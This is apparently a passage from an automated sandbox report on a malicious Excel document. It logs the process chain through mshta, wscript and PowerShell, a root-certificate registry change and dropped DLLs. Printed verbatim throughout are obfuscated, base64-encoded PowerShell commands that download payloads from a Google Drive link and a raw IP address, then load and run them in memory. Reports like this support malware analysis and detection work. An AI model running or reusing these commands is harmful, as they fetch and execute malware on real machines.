bY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E022D push eax; iretd 5_2_000007FE899E0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E00BD pushad ; iretd 5_2_000007FE899E00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89AB1D55 push eax; iretd 5_2_000007FE89AB1D79

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
